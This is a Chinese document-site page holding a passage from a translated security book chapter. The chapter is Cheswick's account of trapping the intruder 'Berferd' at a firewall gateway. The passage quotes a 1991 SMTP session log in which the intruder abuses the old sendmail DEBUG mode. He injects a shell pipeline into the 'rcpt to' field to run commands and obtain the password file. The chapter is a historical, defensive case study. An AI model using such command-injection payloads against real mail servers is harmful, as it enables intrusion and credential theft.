- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
第10章 与黑客Berferd周旋
下载
第10章 与黑客Berferd周旋
10.1 引言
遭遇黑客并非愉快的经历。知道的主机不可探测的部分受到侵犯,或者系统增加了几个
新的义务系统管理员,也不是件有趣的事情。
但是在我们这里,一个坚实而可靠的网关可以为驾驭黑客提供安全的后盾。 William R.
C h e s w i c k 、Steven M. Bellovin 、Diana DAngelo 和Paul Glick 与一名志愿者(黑客)玩了一翻,
C h e s w i c k讲述了这个故事。
本章的大部分内容取自 [ C h e s w i c k , 1 9 9 2 ]。我们只是插入了一些体会。后见之明也
是一件极好的事情。
正如所有的黑客故事一样,我们从查看日志开始 . . . . . .
10.2 不友好的行为
我第一次发现我们的志愿者,是在他通过一条旧的、有争议的路由发起一个典型请求的
时候。他想要我们的一份口令文件副本,大概是为了普通的目录攻击。但他试图通过那个过
时的sendmail 的D E B U G漏洞来获取它 (请不要和新的 s e n d m a i l 的漏洞混淆起来,那可是一个
军队) 。
下面的材料取自 1 9 9 1年1月1 5 日的日志,显示了十分不友好的行动:
19:43:10 smtpd: 220 SMTP
19:43:14 smtpd: debug
19:43:14 smtpd: DEBUG attempt
19:43:14 smtpd: 200 OK
19:43:25 smtpd: mail from:/dev/null
19:43:25 smtpd: 503 Expecting HELO
19:43:34 smtpd: helo
19:43:34 smtpd: HELO from
19:43:34 smtpd: 250
19:43:42 smtpd: mail from:/dev/null
19:43:42 smtpd: 250 OK
19:43:59 smtpd: rcpt to:/dev/^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H
19:43:59 smtpd: 501 syntax error in recipient name
19:44:44 smtpd: rcpt to:|sed -e 1,/^$/d | /bin/sh ; exit 0
19:44:44 smtpd: shell characters:|sed -e 1,/^$/d | /bin/sh ; exit 0
19:44:45 smtpd: 250 OK
19:44:48 smtpd: data
19:44:48 smtpd: 354 Start mail input; end with CRLF.CRLF
130使用第三部分 回 顾
下载
19:45:04 smtpd: 250 OK
19:45:04 smtpd: /dev/null sent 48 bytes to upas.security
19:45:08 smtpd: quit
19:45:08 smtpd: 221 Terminating
19:45:08 smtpd: finished.
这是我们的一次S M T P会话日志,S M T P会话通常在两个邮件发送器之间进行。在这个案例
里,有一个人在另一端 (有意或无意)键入一些命令到我们的邮件后台守护程序。他试图使用的
第一个命令是D E B U G 。当他得到“250 OK ”响应时一定很吃惊(实现这次陷阱需要我们邮件发
送器中的几行代码,参见第7章。这些代码已纳入UNIX SVR4 的邮件发送器中) 。关键的一行是
在1 9 : 4 4 : 4 4时输入的命令rcpt to :。该命令行的尖角括号中的文本通常是邮件接收者的地址。此
处包含了一个命令行。当处于调试模式时
您可能关注的文档
- 资源约束条件下工期_质量_成本综合均衡优化.pdf
- 基于项目的学习在_动物学_教学中的探索和实践_时磊.pdf
- F2012-E04-002-THE RING-SHAPED ROUTE BODY 环状路径车身.pdf
- 簧丝为矩形截面的圆柱形螺旋弹簧的稳定性_曲焱.pdf
- 雅思考试中易令人误解的词汇解析(一).pdf
- 车辆碰撞事故再现技术研究的现状与发展方向.pdf
- 2016年北京师范大学翻译硕士MTI考研参考书推荐,考研历年真题.pdf
- 美国幼师最常用101句赞赏语.pdf
- 作文巨讲堂10月.pdf
- 基于遗传算法的警车巡逻问题求解.pdf
- Linux操作系统--2 安装Linux操作系统.pdf
- 护理人员对预防难免压疮的质性研究.pdf
- 新GRE填空题选项单独出现几率大-智课教育旗下智课教育.pdf
- 武汉理工大学考博英语核心词汇集锦.pdf
- 2014美国奥林匹亚化学试题.pdf
- 双语新闻:《侏罗纪世界》成2015年电影穿帮之王.pdf
- 一个疯子眼中的常人世界论卡夫卡及其荒诞感.pdf
- Neff :Strong coherence between solar variability and the monsoon in Oman between 9 and 6 kyr ago.pdf
- 线性代数1-01 逆序数-行列式定义.pdf
- 07《数据结构》第五章.pdf
原创力文档


文档评论(0)